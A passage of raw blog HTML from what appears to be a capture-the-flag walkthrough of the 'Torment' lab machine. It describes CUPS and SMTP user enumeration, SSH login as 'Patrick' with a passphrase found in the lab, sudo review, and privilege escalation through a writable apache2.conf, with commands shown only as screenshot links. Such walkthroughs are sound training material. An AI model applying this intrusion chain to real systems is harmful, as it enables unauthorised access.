font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Joining channel &lt;b&gt;tormentedprinter&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYDCVxzI2p8mq5vpytb9cMntkoHwzWBqpVIluOYsKRfJVukRB4zp1N-epbJZFajeA22zeDD054xIilDvI9pfT5HxYUVaRt7L7zFFBSRrM3LFuw9N4gv5MBtTqR7Rx1t9IWTPH5WbFAXkuv/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;31&quot; data-original-width=&quot;210&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYDCVxzI2p8mq5vpytb9cMntkoHwzWBqpVIluOYsKRfJVukRB4zp1N-epbJZFajeA22zeDD054xIilDvI9pfT5HxYUVaRt7L7zFFBSRrM3LFuw9N4gv5MBtTqR7Rx1t9IWTPH5WbFAXkuv/s16000/screenshot.16.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi94A9v2ZzrnmjLxC3DKZlneXrp5Rz1EgVxqO97InZ0CC0jbHMYmN-P-EIp-TQZOM5DQTSHc8CVlplv-gFH5LG1bhq7ShaB3FLeakIWXm8fKzbFdzen7g5jjhX4Kugf4GFMXc5Ogqwt7RFx/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;213&quot; data-original-width=&quot;861&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi94A9v2ZzrnmjLxC3DKZlneXrp5Rz1EgVxqO97InZ0CC0jbHMYmN-P-EIp-TQZOM5DQTSHc8CVlplv-gFH5LG1bhq7ShaB3FLeakIWXm8fKzbFdzen7g5jjhX4Kugf4GFMXc5Ogqwt7RFx/s16000/screenshot.17.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- We have found this password for configuration purposes:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;mostmachineshaveasupersercurekeyandalongpassphrase&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;- &lt;/span&gt;&lt;b style=&quot;font-family: arial;&quot;&gt;CUPS&lt;/b&gt;&lt;span style=&quot;font-family: arial;&quot;&gt; is a printing server that is running at port 631:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigB8XmqD8u5BnZ7wcAgTe_z13Y7joiC154WFmgqPcuQYTgXjKKmxannfnLe-rVhzxRWZuHMzC560IVtMCVsqXbw_Puv9J1TFO4usGyqv_nGGUqOubpac_8b9ZwoGzSNN4noBetuObBfOJJ/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;337&quot; data-original-width=&quot;440&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigB8XmqD8u5BnZ7wcAgTe_z13Y7joiC154WFmgqPcuQYTgXjKKmxannfnLe-rVhzxRWZuHMzC560IVtMCVsqXbw_Puv9J1TFO4usGyqv_nGGUqOubpac_8b9ZwoGzSNN4noBetuObBfOJJ/s16000/screenshot.68.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Connecting to the CUPS server at port 631:&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi53fwrDmWiXSTHZhvYlRRwVeRpJ81xxsDe3lYmhNWIaSw2iAPuQ0ZhbY1nfoRLUYPFw2Ae6Ey_5Qm0L-Xwk4gQVKjxlgz2lvlzcpNcbeyn5nNbUudAQ8f7TWP5k0ffySokB_YMoBX9K2P8/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;521&quot; data-original-width=&quot;1017&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi53fwrDmWiXSTHZhvYlRRwVeRpJ81xxsDe3lYmhNWIaSw2iAPuQ0ZhbY1nfoRLUYPFw2Ae6Ey_5Qm0L-Xwk4gQVKjxlgz2lvlzcpNcbeyn5nNbUudAQ8f7TWP5k0ffySokB_YMoBX9K2P8/s16000/screenshot.26.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;- Clicking tab &lt;/span&gt;&lt;b style=&quot;font-family: arial;&quot;&gt;Printers&lt;/b&gt;&lt;span style=&quot;font-family: arial;&quot;&gt; we find a list of printing services users:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidsz86bj0B3byiBggogrHCdVgYtd6eAXBdFbLlmf0gtRop0tWPixy8vGRtEUSOFyD-NdUaRk1qupbyizs71X7FISEabE_-iWRXsMjvsXdJ5XoDKmgVDpZSRYA9Ga6CEWiO9cadO2-viWbk/&quot; style=&quot;clear: left; display: inline; font-family: arial; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;753&quot; data-original-width=&quot;862&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidsz86bj0B3byiBggogrHCdVgYtd6eAXBdFbLlmf0gtRop0tWPixy8vGRtEUSOFyD-NdUaRk1qupbyizs71X7FISEabE_-iWRXsMjvsXdJ5XoDKmgVDpZSRYA9Ga6CEWiO9cadO2-viWbk/s16000/screenshot.27.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;- Gathering all potential usernames:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRKTmiHRjSlgzQony-5vBvX1HIWPILRpTXCe4tRyR7v7XTMPOASIVRvRAAvsaLtbNDWlgNEDagjZYziHa22wuUh8jp8CF1EWk88FbNgZq-NiS9ASVvzbw1o9ZCNxQXj4qfxhGbFbU1BAvN/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;390&quot; data-original-width=&quot;328&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRKTmiHRjSlgzQony-5vBvX1HIWPILRpTXCe4tRyR7v7XTMPOASIVRvRAAvsaLtbNDWlgNEDagjZYziHa22wuUh8jp8CF1EWk88FbNgZq-NiS9ASVvzbw1o9ZCNxQXj4qfxhGbFbU1BAvN/s16000/screenshot.18.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Msfconsole helps to enumerate SMTP service, passing file &lt;b&gt;u&lt;/b&gt; and discovering that &lt;b&gt;Patrick&lt;/b&gt; and &lt;b&gt;Qiu&lt;/b&gt; are essential and real users:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7gKRcko7aWZcvXN4hSW32GLVWrUa26IexsdlxMO740ciiipAAE6j0LGdTj5mXMshGGUzqOK2OqQLQQ-Ewj336-fsy8UBISv5lViXAEAoAhYVPWAZkm8fYCQhyphenhyphenp2NTgdfaH5QFNLoOOJXC/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;250&quot; data-original-width=&quot;833&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7gKRcko7aWZcvXN4hSW32GLVWrUa26IexsdlxMO740ciiipAAE6j0LGdTj5mXMshGGUzqOK2OqQLQQ-Ewj336-fsy8UBISv5lViXAEAoAhYVPWAZkm8fYCQhyphenhyphenp2NTgdfaH5QFNLoOOJXC/s16000/screenshot.28.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Also, we could know about &lt;b&gt;Patrick&lt;/b&gt; and &lt;b&gt;Qiu&lt;/b&gt; from &lt;b&gt;Torment&lt;/b&gt;&#39;s login screen:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4Hi2vSp1QZ1O9CoXBf6UCegCSRCpab6U_dyZQiiQqdjulcQIXZsFLwaN__b5Sz8O2h5-oWW0CZ_uNRjZqpvQ_homlICa4XNYaA3b78OBVzTPFTfiNcEJ0tIMUvTGBaK_klHzo_bvRswZj/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;242&quot; data-original-width=&quot;380&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4Hi2vSp1QZ1O9CoXBf6UCegCSRCpab6U_dyZQiiQqdjulcQIXZsFLwaN__b5Sz8O2h5-oWW0CZ_uNRjZqpvQ_homlICa4XNYaA3b78OBVzTPFTfiNcEJ0tIMUvTGBaK_klHzo_bvRswZj/s16000/screenshot.71.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;- SSH-ing as user &lt;b&gt;Patrick, &lt;/b&gt;with &lt;b&gt;id_rsa &lt;/b&gt;and password&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;b&gt;mostmachineshaveasupersercurekeyandalongpassphrase:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiK98Ki-GIrG4bZGHifvSviLFIUgnZHU6FVlAhT_NtlU84I9eiAWAFkLOHknuEhxtx9IrB-zVTsuVGYqUajNtzccosuypBQg5ea6v-pb9BBwTEYZdOkE3g4tNTfX3aNRt8qemR_tSv-0X7j/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;373&quot; data-original-width=&quot;830&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiK98Ki-GIrG4bZGHifvSviLFIUgnZHU6FVlAhT_NtlU84I9eiAWAFkLOHknuEhxtx9IrB-zVTsuVGYqUajNtzccosuypBQg5ea6v-pb9BBwTEYZdOkE3g4tNTfX3aNRt8qemR_tSv-0X7j/s16000/screenshot.29.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Sudoer privileges for Patrick include &lt;b&gt;poweroff&lt;/b&gt; and &lt;b&gt;reboot&lt;/b&gt; services with command &lt;b&gt;systemctl&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHf9jI-dSo9gPMyHS2VW1gXkhX18HAQBVCp062Dt2PLWJIaKAsXPu9fH7bxHB5eQR5_KneNUg1Y5FrqJ2T5udajzGHtSSgn9hpMt1Ngmyttvq6W7ZXrs0ceLE8Ovh9hpM065TTd4bT2V_H/&quot; style=&quot;clear: left; display: inline; font-family: arial; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;138&quot; data-original-width=&quot;988&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHf9jI-dSo9gPMyHS2VW1gXkhX18HAQBVCp062Dt2PLWJIaKAsXPu9fH7bxHB5eQR5_KneNUg1Y5FrqJ2T5udajzGHtSSgn9hpMt1Ngmyttvq6W7ZXrs0ceLE8Ovh9hpM065TTd4bT2V_H/s16000/screenshot.30.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;color: #6fa8dc; font-family: arial;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;4 - PRIVILEGE ESCALATION&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Looking for files with write and execute permissions for all users, we find that &lt;b&gt;apache2.conf&lt;/b&gt; is writable:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkLd5BK4PGBimLR1ixMeLbD5P5hMgSTgLGICqF6uqpUOYc2P2yJJBVljW0USTD26W3xnBn4-zKKTgqf1e4uCR_Di-UK5qxzioPpFvE7pxQrZb3pwd30vbKlVQ6nBE_bzKkBXnoyhvaGLXF/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;51&quot; data-original-width=&quot;663&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkLd5BK4PGBimLR1ixMeLbD5P5hMgSTgLGICqF6uqpUOYc2P2yJJBVljW0USTD26W3xnBn4-zKKTgqf1e4uCR_Di-UK5qxzioPpFvE7pxQrZb3pwd30vbKlVQ6nBE_bzKkBXnoyhvaGLXF/s16000/screenshot.33.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Adding user &lt;b&gt;qiu&lt;/b&gt; to &lt;b&gt;Apache&lt;/b&gt; configuration:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLc726045YiaMStLDotX4Fbzzj-VostJ-uqlMEIV7VgK1inv4gyXdeOmcjJc5wCCgS7PbZhA96RmWYJkxK3A0Wk_eYGzjaJFatNuz6ZqYIThalgnUuCDjtOLLjAtkfksCugI4IqmBSYZBs/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;23&quot; data-original-width=&quot;552&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLc726045YiaMStLDotX4Fbzzj-VostJ-uqlMEIV7VgK1inv4gyXdeOmcjJc5wCCgS7PbZhA96RmWYJkxK3A0Wk_eYGzjaJFatNuz6ZqYIThalgnUuCDjtOLLjAtkfksCugI4IqmBSYZBs/s16000/screenshot.34.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmU-7-2D6a2gTKc9wTE8x-cVpXdQJIdCWu_rgpyIZ9bLjlwKc6Y66GYQShqjh7M1461VxQR3Umf8vDCp6lwio0MfsGuVQmlb3v7yrFiW4DMQ_TtaxANm1eYb9sArBpsbSlpQNLPqqIrZ7O/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;86&quot; data-original-width=&quot;584&quot; 